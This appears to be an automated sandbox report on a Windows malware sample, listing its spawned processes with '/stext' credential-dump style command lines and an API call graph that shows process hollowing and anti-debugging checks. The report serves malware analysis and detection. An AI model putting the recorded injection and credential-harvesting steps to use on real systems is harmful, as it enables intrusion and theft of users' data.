                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
                                                            Imagebase:0xf0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
                                                            Imagebase:0xfc0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:13:37:10
                                                            Start date:28/10/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"
                                                            Imagebase:0x7c0000
                                                            File size:1'144'840 bytes
                                                            MD5 hash:03A6863E7931768C020F1A98531E5212
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:1.1%
                                                              Total number of Nodes:265
                                                              Total number of Limit Nodes:7
                                                              execution_graph 31461 44f47ce 31463 44f46e9 31461->31463 31462 44f49c1 31463->31462 31467 44f7556 31463->31467 31489 44f74f0 31463->31489 31510 44f74e1 31463->31510 31468 44f74e4 31467->31468 31470 44f7559 31467->31470 31469 44f7512 31468->31469 31531 44f7dd0 31468->31531 31539 44f7b30 31468->31539 31544 44f8050 31468->31544 31549 44f7e91 31468->31549 31554 44f7931 31468->31554 31559 44f7c92 31468->31559 31567 44f7a94 31468->31567 31572 44f7cd5 31468->31572 31577 44f7ab6 31468->31577 31582 44f7df6 31468->31582 31587 44f7bd7 31468->31587 31594 44f8178 31468->31594 31599 44f7a3a 31468->31599 31604 44f7b1c 31468->31604 31612 44f7fdd 31468->31612 31620 44f7d85 31468->31620 31625 44f790f 31468->31625 31630 44f80af 31468->31630 31469->31462 31470->31462 31490 44f750a 31489->31490 31491 44f80af 2 API calls 31490->31491 31492 44f790f 2 API calls 31490->31492 31493 44f7512 31490->31493 31494 44f7d85 2 API calls 31490->31494 31495 44f7fdd 4 API calls 31490->31495 31496 44f7b1c 4 API calls 31490->31496 31497 44f7a3a 2 API calls 31490->31497 31498 44f8178 2 API calls 31490->31498 31499 44f7bd7 4 API calls 31490->31499 31500 44f7df6 2 API calls 31490->31500 31501 44f7ab6 2 API calls 31490->31501 31502 44f7cd5 2 API calls 31490->31502 31503 44f7a94 2 API calls 31490->31503 31504 44f7c92 4 API calls 31490->31504 31505 44f7931 2 API calls 31490->31505 31506 44f7e91 2 API calls 31490->31506 31507 44f8050 2 API calls 31490->31507 31508 44f7b30 2 API calls 31490->31508 31509 44f7dd0 4 API calls 31490->31509 31491->31493 31492->31493 31493->31462 31494->31493 31495->31493 31496->31493 31497->31493 31498->31493 31499->31493 31500->31493 31501->31493 31502->31493 31503->31493 31504->31493 31505->31493 31506->31493 31507->31493 31508->31493 31509->31493 31511 44f750a 31510->31511 31512 44f7512 31511->31512 31513 44f80af 2 API calls 31511->31513 31514 44f790f 2 API calls 31511->31514 31515 44f7d85 2 API calls 31511->31515 31516 44f7fdd 4 API calls 31511->31516 31517 44f7b1c 4 API calls 31511->31517 31518 44f7a3a 2 API calls 31511->31518 31519 44f8178 2 API calls 31511->31519 31520 44f7bd7 4 API calls 31511->31520 31521 44f7df6 2 API calls 31511->31521 31522 44f7ab6 2 API calls 31511->31522 31523 44f7cd5 2 API calls 31511->31523 31524 44f7a94 2 API calls 31511->31524 31525 44f7c92 4 API calls 31511->31525 31526 44f7931 2 API calls 31511->31526 31527 44f7e91 2 API calls 31511->31527 31528 44f8050 2 API calls 31511->31528 31529 44f7b30 2 API calls 31511->31529 31530 44f7dd0 4 API calls 31511->31530 31512->31462 31513->31512 31514->31512 31515->31512 31516->31512 31517->31512 31518->31512 31519->31512 31520->31512 31521->31512 31522->31512 31523->31512 31524->31512 31525->31512 31526->31512 31527->31512 31528->31512 31529->31512 31530->31512 31532 44f7ddd 31531->31532 31642 44f4100 31532->31642 31646 44f4108 31532->31646 31533 44f7a9d 31534 44f7e22 31533->31534 31634 44f3992 31533->31634 31638 44f3998 31533->31638 31534->31469 31534->31534 31540 44f7b40 31539->31540 31650 44f4018 31540->31650 31654 44f4011 31540->31654 31541 44f7cca 31541->31469 31545 44f806b 31544->31545 31547 44f4018 WriteProcessMemory 31545->31547 31548 44f4011 WriteProcessMemory 31545->31548 31546 44f808f 31547->31546 31548->31546 31550 44f7e0e 31549->31550 31552 44f3998 ResumeThread 31550->31552 31553 44f3992 ResumeThread 31550->31553 31551 44f7e22 31551->31469 31552->31551 31553->31551 31555 44f791b 31554->31555 31555->31469 31658 44f4295 31555->31658 31662 44f42a0 31555->31662 31560 44f7c9f 31559->31560 31561 44f7a9d 31560->31561 31666 44f3e78 31560->31666 31670 44f3e80 31560->31670 31562 44f7e22 31561->31562 31565 44f3998 ResumeThread 31561->31565 31566 44f3992 ResumeThread 31561->31566 31562->31469 31565->31562 31566->31562 31568 44f7a9d 31567->31568 31569 44f7e22 31568->31569 31570 44f3998 ResumeThread 31568->31570 31571 44f3992 ResumeThread 31568->31571 31569->31469 31570->31569 31571->31569 31573 44f7ce1 31572->31573 31575 44f4018 WriteProcessMemory 31573->31575 31576 44f4011 WriteProcessMemory 31573->31576 31574 44f7f81 31575->31574 31576->31574 31578 44f7a9d 31577->31578 31578->31577 31579 44f7e22 31578->31579 31580 44f3998 ResumeThread 31578->31580 31581 44f3992 ResumeThread 31578->31581 31579->31469 31580->31579 31581->31579 31583 44f7dfc 31582->31583 31585 44f3998 ResumeThread 31583->31585 31586 44f3992 ResumeThread 31583->31586 31584 44f7e22 31584->31469 31585->31584 31586->31584 31674 44f3f58 31587->31674 31678 44f3f50 31587->31678 31588 44f7bf5 31590 44f4018 WriteProcessMemory 31588->31590 31591 44f4011 WriteProcessMemory 31588->31591 31589 44f808f 31590->31589 31591->31589 31595 44f80ae 31594->31595 31597 44f3e78 Wow64SetThreadContext 31595->31597 31598 44f3e80 Wow64SetThreadContext 31595->31598 31596 44f80c9 31597->31596 31598->31596 31600 44f7a47 31599->31600 31601 44f7a75 31600->31601 31602 44f4295 CreateProcessA 31600->31602 31603 44f42a0 CreateProcessA 31600->31603 31601->31469 31602->31601 31603->31601 31605 44f7b29 31604->31605 31608 44f4108 ReadProcessMemory 31605->31608 31609 44f4100 ReadProcessMemory 31605->31609 31606 44f7a9d 31607 44f7e22 31606->31607 31610 44f3998 ResumeThread 31606->31610 31611 44f3992 ResumeThread 31606->31611 31607->31469 31608->31606 31609->31606 31610->31607 31611->31607 31613 44f7ff8 31612->31613 31616 44f4108 ReadProcessMemory 31613->31616 31617 44f4100 ReadProcessMemory 31613->31617 31614 44f7a9d 31615 44f7e22 31614->31615 31618 44f3998 ResumeThread 31614->31618 31619 44f3992 ResumeThread 31614->31619 31615->31469 31616->31614 31617->31614 31618->31615 31619->31615 31621 44f7d8b 31620->31621 31623 44f4018 WriteProcessMemory 31621->31623 31624 44f4011 WriteProcessMemory 31621->31624 31622 44f808f 31622->31622 31623->31622 31624->31622 31626 44f791b 31625->31626 31628 44f4295 CreateProcessA 31626->31628 31629 44f42a0 CreateProcessA 31626->31629 31627 44f7a75 31627->31469 31628->31627 31629->31627 31632 44f3e78 Wow64SetThreadContext 31630->31632 31633 44f3e80 Wow64SetThreadContext 31630->31633 31631 44f80c9 31632->31631 31633->31631 31635 44f3998 ResumeThread 31634->31635 31637 44f3a09 31635->31637 31637->31534 31639 44f39d8 ResumeThread 31638->31639 31641 44f3a09 31639->31641 31641->31534 31643 44f4153 ReadProcessMemory 31642->31643 31645 44f4197 31643->31645 31645->31533 31647 44f4153 ReadProcessMemory 31646->31647 31649 44f4197 31647->31649 31649->31533 31651 44f4060 WriteProcessMemory 31650->31651 31653 44f40b7 31651->31653 31653->31541 31655 44f4060 WriteProcessMemory 31654->31655 31657 44f40b7 31655->31657 31657->31541 31659 44f4329 CreateProcessA 31658->31659 31661 44f44eb 31659->31661 31661->31661 31663 44f4329 CreateProcessA 31662->31663 31665 44f44eb 31663->31665 31665->31665 31667 44f3e80 Wow64SetThreadContext 31666->31667 31669 44f3f0d 31667->31669 31669->31561 31671 44f3ec5 Wow64SetThreadContext 31670->31671 31673 44f3f0d 31671->31673 31673->31561 31675 44f3f98 VirtualAllocEx 31674->31675 31677 44f3fd5 31675->31677 31677->31588 31679 44f3f58 VirtualAllocEx 31678->31679 31681 44f3fd5 31679->31681 31681->31588 31682 232d2a0 31683 232d2e6 GetCurrentProcess 31682->31683 31685 232d331 31683->31685 31686 232d338 GetCurrentThread 31683->31686 31685->31686 31687 232d375 GetCurrentProcess 31686->31687 31688 232d36e 31686->31688 31689 232d3ab 31687->31689 31688->31687 31690 232d3d3 GetCurrentThreadId 31689->31690 31691 232d404 31690->31691 31714 232af10 31715 232af1f 31714->31715 31718 232aff7 31714->31718 31723 232b008 31714->31723 31719 232b03c 31718->31719 31720 232b019 31718->31720 31719->31715 31720->31719 31721 232b240 GetModuleHandleW 31720->31721 31722 232b26d 31721->31722 31722->31715 31724 232b03c 31723->31724 31725 232b019 31723->31725 31724->31715 31725->31724 31726 232b240 GetModuleHandleW 31725->31726 31727 232b26d 31726->31727 31727->31715 31728 50698e2 31730 506981c 31728->31730 31732 5068a68 31730->31732 31736 5068a74 31730->31736 31733 5069c08 OutputDebugStringW 31732->31733 31735 5069c87 31733->31735 31735->31730 31737 5069cb8 CloseHandle 31736->31737 31739 5069d26 31737->31739 31739->31730 31740 5069760 31742 5069784 31740->31742 31741 5068a68 OutputDebugStringW 31741->31742 31742->31741 31743 5068a74 CloseHandle 31742->31743 31743->31742 31744 50679b0 31745 50679cc 31744->31745 31749 50688d7 31745->31749 31755 50688e8 31745->31755 31748 5067a76 31750 50688fa 31749->31750 31761 506896f 31750->31761 31767 5068928 31750->31767 31772 5068918 31750->31772 31751 506890e 31751->31748 31756 50688fa 31755->31756 31758 506896f NtQueryInformationProcess 31756->31758 31759 5068918 NtQueryInformationProcess 31756->31759 31760 5068928 NtQueryInformationProcess 31756->31760 31757 506890e 31757->31748 31758->31757 31759->31757 31760->31757 31762 5068926 31761->31762 31763 506897a 31761->31763 31777 5068de8 31762->31777 31781 5068df8 31762->31781 31763->31751 31764 5068965 31764->31751 31768 5068942 31767->31768 31770 5068de8 NtQueryInformationProcess 31768->31770 31771 5068df8 NtQueryInformationProcess 31768->31771 31769 5068965 31769->31751 31770->31769 31771->31769 31773 5068942 31772->31773 31775 5068de8 NtQueryInformationProcess 31773->31775 31776 5068df8 NtQueryInformationProcess 31773->31776 31774 5068965 31774->31751 31775->31774 31776->31774 31778 5068e1c 31777->31778 31785 5068a18 31778->31785 31782 5068e1c 31781->31782 31783 5068a18 NtQueryInformationProcess 31782->31783 31784 5068ea3 31783->31784 31784->31764 31786 5068f58 NtQueryInformationProcess 31785->31786 31788 5068ea3 31786->31788 31788->31764 31789 44f86f8 31790 44f8883 31789->31790 31792 44f871e 31789->31792 31792->31790 31793 44f50c0 31792->31793 31794 44f8978 PostMessageW 31793->31794 31795 44f89e4 31794->31795 31795->31792 31692 2324668 31693 2324672 31692->31693 31695 2324759 31692->31695 31696 232477d 31695->31696 31700 2324868 31696->31700 31704 2324858 31696->31704 31702 232488f 31700->31702 31701 232496c 31701->31701 31702->31701 31708 23244c4 31702->31708 31706 232488f 31704->31706 31705 232496c 31705->31705 31706->31705 31707 23244c4 CreateActCtxA 31706->31707 31707->31705 31709 23258f8 CreateActCtxA 31708->31709 31711 23259bb 31709->31711 31712 232d4e8 DuplicateHandle 31713 232d57e 31712->31713

                                                              Executed Functions

                                                              Function 05068F50 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05068FD7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID:
                                                              • API String ID: 1778838933-0
                                                              • Opcode ID: 91f73154baf9763b24eac4351879c453451e78a0c767af54cf3dbb16e81f9d66
                                                              • Instruction ID: 2a6dc2e74dfbc13cf6233b7ace7d976d97864d606439053a2e88d0022cf7af86
                                                              • Opcode Fuzzy Hash: 91f73154baf9763b24eac4351879c453451e78a0c767af54cf3dbb16e81f9d66
                                                              • Instruction Fuzzy Hash: 4E21E0B6900249DFCB10CF9AD884ADEFBF4FF48310F10852AE919A7211D375A944CFA5
                                                              Function 05068A18 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05068FD7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID:
                                                              • API String ID: 1778838933-0
                                                              • Opcode ID: 9655cff9a207650ec577caf262c4a9e1cddb161e43accf658b4202349b6d6a34
                                                              • Instruction ID: 03d9c3ccf94a6eeed56e30deba3e299fd8ca6cdb44b71726bd5a97a987329af8
                                                              • Opcode Fuzzy Hash: 9655cff9a207650ec577caf262c4a9e1cddb161e43accf658b4202349b6d6a34
                                                              • Instruction Fuzzy Hash: EC21EFB5904249DFCB10DF9AD884ADEBBF5FF48310F10842AE919A7211C375A944CFA5
                                                              Function 05065D70 Relevance: .5, Instructions: 506COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 69268eb7c7c534cedd5e0b3e72c736b51be3e6d1ea9a6477a5541b734567f9a5
                                                              • Instruction ID: 31c27dd0bab3d0e955993dc083f2295c00d6a5781157b970560c50b4d31a346f
                                                              • Opcode Fuzzy Hash: 69268eb7c7c534cedd5e0b3e72c736b51be3e6d1ea9a6477a5541b734567f9a5
                                                              • Instruction Fuzzy Hash: 6D428C74A01229CFDB64CFA9D984B9DBBB2BF48310F1081A9D819AB355D735AE81CF50
                                                              Function 05065D61 Relevance: .2, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe073191e7a362b892d44a12915075ad2816c683953d49391fceb532002e8c3b
                                                              • Instruction ID: 32082f4000a37b9457830c0bdf5b6ebc887c80a2f43b943984c239b9418ba142
                                                              • Opcode Fuzzy Hash: fe073191e7a362b892d44a12915075ad2816c683953d49391fceb532002e8c3b
                                                              • Instruction Fuzzy Hash: AB619275E01218DFEB18CFAAD984B9DBBF2FF88310F1481A9D819AB254D7359942CF50
                                                              Function 044F7C29 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 35668724e540e18ac946dfb4a60ea53da51efa3e06c52fc8f1633287d38dc91a
                                                              • Instruction ID: fbfb1140bc22785ec296e44365a087eb4dea960a4375ac14a4394aa320cdfa00
                                                              • Opcode Fuzzy Hash: 35668724e540e18ac946dfb4a60ea53da51efa3e06c52fc8f1633287d38dc91a
                                                              • Instruction Fuzzy Hash: 8BE01278E0D190CFCB61EBB06D915F9BBB89B0B300B0A34EA825D9B612E52465529A15
                                                              Function 0232D291 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 294 232d291-232d32f GetCurrentProcess 298 232d331-232d337 294->298 299 232d338-232d36c GetCurrentThread 294->299 298->299 300 232d375-232d3a9 GetCurrentProcess 299->300 301 232d36e-232d374 299->301 302 232d3b2-232d3cd call 232d470 300->302 303 232d3ab-232d3b1 300->303 301->300 307 232d3d3-232d402 GetCurrentThreadId 302->307 303->302 308 232d404-232d40a 307->308 309 232d40b-232d46d 307->309 308->309
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D31E
                                                              • GetCurrentThread.KERNEL32 ref: 0232D35B
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D398
                                                              • GetCurrentThreadId.KERNEL32 ref: 0232D3F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 96a3b03859248c3533c615c535a9e2063bf72326fb9ed4e618b19d95305f87ba
                                                              • Instruction ID: 3069368d47e7383eb5fea62987d7e2dd862af07dccf2ba141098737e3aab5903
                                                              • Opcode Fuzzy Hash: 96a3b03859248c3533c615c535a9e2063bf72326fb9ed4e618b19d95305f87ba
                                                              • Instruction Fuzzy Hash: 345186B1A012098FDB14CFA9DA48BDEBFF1EF48314F24805DE509A7351D738A944CB65
                                                              Function 0232D2A0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 316 232d2a0-232d32f GetCurrentProcess 320 232d331-232d337 316->320 321 232d338-232d36c GetCurrentThread 316->321 320->321 322 232d375-232d3a9 GetCurrentProcess 321->322 323 232d36e-232d374 321->323 324 232d3b2-232d3cd call 232d470 322->324 325 232d3ab-232d3b1 322->325 323->322 329 232d3d3-232d402 GetCurrentThreadId 324->329 325->324 330 232d404-232d40a 329->330 331 232d40b-232d46d 329->331 330->331
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D31E
                                                              • GetCurrentThread.KERNEL32 ref: 0232D35B
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D398
                                                              • GetCurrentThreadId.KERNEL32 ref: 0232D3F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: e13edb9de55e9297b0a81b5b6d9c82c69e140623ae8fbb34c8ee9e1a953285c9
                                                              • Instruction ID: b39cded4d292508a2c96a55c0b69c762ae0a30f2af965c646ea085ba7a1603a4
                                                              • Opcode Fuzzy Hash: e13edb9de55e9297b0a81b5b6d9c82c69e140623ae8fbb34c8ee9e1a953285c9
                                                              • Instruction Fuzzy Hash: A55186B19002098FDB14CFAADA48BDEBBF1EF88314F24805DE509A7350E738A944CF65
                                                              Function 044F4295 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 485 44f4295-44f4335 487 44f436e-44f438e 485->487 488 44f4337-44f4341 485->488 493 44f43c7-44f43f6 487->493 494 44f4390-44f439a 487->494 488->487 489 44f4343-44f4345 488->489 491 44f4368-44f436b 489->491 492 44f4347-44f4351 489->492 491->487 495 44f4355-44f4364 492->495 496 44f4353 492->496 504 44f442f-44f44e9 CreateProcessA 493->504 505 44f43f8-44f4402 493->505 494->493 497 44f439c-44f439e 494->497 495->495 498 44f4366 495->498 496->495 499 44f43c1-44f43c4 497->499 500 44f43a0-44f43aa 497->500 498->491 499->493 502 44f43ae-44f43bd 500->502 503 44f43ac 500->503 502->502 506 44f43bf 502->506 503->502 516 44f44eb-44f44f1 504->516 517 44f44f2-44f4578 504->517 505->504 507 44f4404-44f4406 505->507 506->499 509 44f4429-44f442c 507->509 510 44f4408-44f4412 507->510 509->504 511 44f4416-44f4425 510->511 512 44f4414 510->512 511->511 513 44f4427 511->513 512->511 513->509 516->517 527 44f457a-44f457e 517->527 528 44f4588-44f458c 517->528 527->528 529 44f4580 527->529 530 44f458e-44f4592 528->530 531 44f459c-44f45a0 528->531 529->528 530->531 532 44f4594 530->532 533 44f45a2-44f45a6 531->533 534 44f45b0-44f45b4 531->534 532->531 533->534 535 44f45a8 533->535 536 44f45c6-44f45cd 534->536 537 44f45b6-44f45bc 534->537 535->534 538 44f45cf-44f45de 536->538 539 44f45e4 536->539 537->536 538->539 541 44f45e5 539->541 541->541
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 044F44D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 770eaf8fce568e80339a3f675a7ee94516aead7fc3a1e3995538cf9db9e59bb1
                                                              • Instruction ID: c9beb7f3efa66762f2af9b4bfdd1279afb7e1816273ede4b528daa85b8cc9ea4
                                                              • Opcode Fuzzy Hash: 770eaf8fce568e80339a3f675a7ee94516aead7fc3a1e3995538cf9db9e59bb1
                                                              • Instruction Fuzzy Hash: A3A13B71D002199FEF20DF68CC41BEEBBB2BB48314F14856AD918A7250DB75A985CF91
                                                              Function 044F42A0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 542 44f42a0-44f4335 544 44f436e-44f438e 542->544 545 44f4337-44f4341 542->545 550 44f43c7-44f43f6 544->550 551 44f4390-44f439a 544->551 545->544 546 44f4343-44f4345 545->546 548 44f4368-44f436b 546->548 549 44f4347-44f4351 546->549 548->544 552 44f4355-44f4364 549->552 553 44f4353 549->553 561 44f442f-44f44e9 CreateProcessA 550->561 562 44f43f8-44f4402 550->562 551->550 554 44f439c-44f439e 551->554 552->552 555 44f4366 552->555 553->552 556 44f43c1-44f43c4 554->556 557 44f43a0-44f43aa 554->557 555->548 556->550 559 44f43ae-44f43bd 557->559 560 44f43ac 557->560 559->559 563 44f43bf 559->563 560->559 573 44f44eb-44f44f1 561->573 574 44f44f2-44f4578 561->574 562->561 564 44f4404-44f4406 562->564 563->556 566 44f4429-44f442c 564->566 567 44f4408-44f4412 564->567 566->561 568 44f4416-44f4425 567->568 569 44f4414 567->569 568->568 570 44f4427 568->570 569->568 570->566 573->574 584 44f457a-44f457e 574->584 585 44f4588-44f458c 574->585 584->585 586 44f4580 584->586 587 44f458e-44f4592 585->587 588 44f459c-44f45a0 585->588 586->585 587->588 589 44f4594 587->589 590 44f45a2-44f45a6 588->590 591 44f45b0-44f45b4 588->591 589->588 590->591 592 44f45a8 590->592 593 44f45c6-44f45cd 591->593 594 44f45b6-44f45bc 591->594 592->591 595 44f45cf-44f45de 593->595 596 44f45e4 593->596 594->593 595->596 598 44f45e5 596->598 598->598
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 044F44D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 340e6e8bc0ae264b087fc4337cbc878d174f7e2b59847cb056cd34722da65c33
                                                              • Instruction ID: b6aa4893a9741e713932224670044bec5de827452507992ca5d5eccea58945d1
                                                              • Opcode Fuzzy Hash: 340e6e8bc0ae264b087fc4337cbc878d174f7e2b59847cb056cd34722da65c33
                                                              • Instruction Fuzzy Hash: 71913B71D002299FEF20DF68CC41BEEBBB2BF48314F14856AD918A7250DB74A985CF91
                                                              Function 0232B008 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 599 232b008-232b017 600 232b043-232b047 599->600 601 232b019-232b026 call 232acc0 599->601 603 232b05b-232b09c 600->603 604 232b049-232b053 600->604 607 232b028 601->607 608 232b03c 601->608 610 232b0a9-232b0b7 603->610 611 232b09e-232b0a6 603->611 604->603 654 232b02e call 232b2a0 607->654 655 232b02e call 232b291 607->655 608->600 612 232b0db-232b0dd 610->612 613 232b0b9-232b0be 610->613 611->610 617 232b0e0-232b0e7 612->617 615 232b0c0-232b0c7 call 232accc 613->615 616 232b0c9 613->616 614 232b034-232b036 614->608 618 232b178-232b238 614->618 620 232b0cb-232b0d9 615->620 616->620 621 232b0f4-232b0fb 617->621 622 232b0e9-232b0f1 617->622 649 232b240-232b26b GetModuleHandleW 618->649 650 232b23a-232b23d 618->650 620->617 624 232b108-232b10a call 232acdc 621->624 625 232b0fd-232b105 621->625 622->621 629 232b10f-232b111 624->629 625->624 630 232b113-232b11b 629->630 631 232b11e-232b123 629->631 630->631 632 232b141-232b14e 631->632 633 232b125-232b12c 631->633 640 232b150-232b16e 632->640 641 232b171-232b177 632->641 633->632 635 232b12e-232b13e call 232acec call 232acfc 633->635 635->632 640->641 651 232b274-232b288 649->651 652 232b26d-232b273 649->652 650->649 652->651 654->614 655->614
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0232B25E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 4c0720f342f6c299c82404248df680a5184c63ce77639a9d4a6fcbc91fc69891
                                                              • Instruction ID: 2caafd5e26590b428d04719839cdbbd758eae2d5ae53d62b882d4c030cc9d8b0
                                                              • Opcode Fuzzy Hash: 4c0720f342f6c299c82404248df680a5184c63ce77639a9d4a6fcbc91fc69891
                                                              • Instruction Fuzzy Hash: 367135B0A00B158FD725DF2AD44475ABBF6FF88308F00892ED49AD7A50DB75E949CB90
                                                              Function 023244C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
